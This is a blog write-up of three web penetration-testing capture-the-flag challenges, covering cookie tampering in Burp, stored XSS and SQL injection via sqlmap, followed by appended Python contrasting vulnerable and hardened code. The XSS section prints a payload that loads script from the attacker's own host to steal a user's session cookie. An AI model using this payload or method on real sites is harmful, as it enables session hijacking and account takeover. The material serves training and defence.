Friday, July 28, 2017

Web Penetration Testing - Reveal Flags

Web Penetration Testing 1 – Club Status

Turn on intercept in Burp Suite and go to the website. You can then see the GET request. There are two cookies, called PHPSESSID and vip. Edit the vip cookie value from 0 to 1 and forward the request.


The page now shows a Blog link. Click the Blog link and the flag for this challenge is revealed.

Web Penetration Testing 2 – Om nom nom nom


After completing challenge 1, you can browse the Blog page. There is a user called Sycamore. Go to Sycamore's blog, where there is a comment box we can post comments in. The next step is to look for vulnerabilities in this comment box.

Type `<script>alert("xss")</script>` in the comment box and submit it. You can see the alert message.


That's it. We found the XSS vulnerability. The next step is to steal Sycamore's PHPSESSID cookie. To do that, we have to host a server. We create a file named file.j containing some JavaScript that reads the user's cookie, and use Python's SimpleHTTPServer to host it on port 80.

Now we can create an XSS payload for the comment field. It looks like this.

<script src=//<IP>/file.j></script>

Add this comment to the blog page and wait a while. After a short time we can see entries in the Python server's log like this.


From those entries, we can get Sycamore's cookie value. Loading the page with the cookie value we got from the server reveals the flag.




Web Penetration Testing 3 – Nonce-sense

After looking around the site while logged in as Sycamore, we notice that users can delete comments. The CSRF token prevents automated tools from testing payloads. Burp has a feature for this: macros.
We need to set up Burp with a new session handling rule, record a macro, and use it to generate a fresh CSRF token for each request.




We need to add a custom parameter for the CSRF token.





We need to specify which parameter we want the macro to update.






We need to define the scope of the session.



Then go to Repeater and press the Go button. Each time you press Go, you get a different CSRF token.


You can test for SQL injection here by adding a ' after comment_id=. The response shows that there is a SQL injection vulnerability.


Save the request to a file and name it "deletecomment_file".


Now we can do the rest with the sqlmap tool.



We can see five tables in the cysca database. We use the "flag" table.



Finally, we can reveal the flag.
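As an added example that is not part of the original write-up, here is the defender's side of challenges 2 and 3 in Python: the comment rendering and comment deletion as the write-up describes them, next to hardened versions (HTML encoding, an HttpOnly session cookie so script cannot read PHPSESSID, and a bound SQL parameter so a stray quote after comment_id= cannot break the query). The SQLite table and the comments are constructed stand-ins for the cysca application.

```python
import html
import sqlite3

# Constructed sample data: two comments, the second being the probe from the write-up.
COMMENTS = [(1, "Nice post!"), (2, '<script>alert("xss")</script>')]


def make_db() -> sqlite3.Connection:
    """In-memory stand-in for the blog's comments table (constructed)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE comments (id INTEGER PRIMARY KEY, body TEXT)")
    conn.executemany("INSERT INTO comments VALUES (?, ?)", COMMENTS)
    return conn


def render_comment_vulnerable(body: str) -> str:
    """Challenge 2 bug: comment text is concatenated into the HTML unchanged."""
    return f"<div class='comment'>{body}</div>"


def render_comment_hardened(body: str) -> str:
    """Fix: encode the comment so the browser treats it as text, not markup."""
    return f"<div class='comment'>{html.escape(body, quote=True)}</div>"


def session_cookie_header(session_id: str) -> str:
    """Set-Cookie value with HttpOnly: document.cookie cannot read PHPSESSID even if XSS lands."""
    return f"PHPSESSID={session_id}; Path=/; HttpOnly; Secure; SameSite=Lax"


def delete_comment_vulnerable(conn: sqlite3.Connection, comment_id: str) -> int:
    """Challenge 3 bug: comment_id is pasted into SQL, so a stray quote raises a syntax error."""
    return conn.execute(f"DELETE FROM comments WHERE id = {comment_id}").rowcount


def delete_comment_hardened(conn: sqlite3.Connection, comment_id: str) -> int:
    """Fix: bind comment_id as a parameter; it is only ever compared as a value."""
    return conn.execute("DELETE FROM comments WHERE id = ?", (comment_id,)).rowcount


if __name__ == "__main__":
    db = make_db()
    for _, body in COMMENTS:
        print(render_comment_hardened(body))
    print(session_cookie_header("constructed-session-id"))
    print("deleted:", delete_comment_hardened(db, "2"))
```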



